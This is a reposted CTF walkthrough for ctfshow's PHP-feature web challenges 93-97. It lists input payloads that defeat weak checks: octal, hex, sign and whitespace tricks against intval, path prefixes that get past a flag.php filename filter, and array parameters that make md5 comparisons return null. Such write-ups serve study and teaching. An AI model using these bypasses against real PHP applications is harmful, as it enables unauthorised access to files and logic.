ctfshow web入门 php特性 web93-97
短信预约 -IT技能 免费直播动态提醒
1.web93
intval($num,0),0代表根据变量类型进行使用哪一种进制进行取整
可以使用8进制,正负数,小数点
payload:
010574
+4476.0
4476.0
2.web94
过滤了0,不能使用8进制了,还可以使用小数点,正负数等
payload:
4476.0
+4476.0
%20010574
intval绕过方法:
intval('4476.0')===4476 小数点 intval('+4476.0')===4476 正负号intval('4476e0')===4476 科学计数法intval('0x117c')===4476 16进制intval('010574')===4476 8进制intval(' 010574')===4476 8进制+空格3.web95
有过滤了点,小数点法用不了了,可以使用空格加八进制数绕过
payload:
%20010574
4.web96
可以使用目录分隔符绕过,相对路径和绝对路径都可以
payload:
./flag.php
/var/www/html/flag.php
5.web97
数字不相等,但是md5值相等
MD5处理数组返回的都是null
payload:
a[]=1&b[]=2
来源地址:https://blog.csdn.net/m0_62207170/article/details/131313128
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
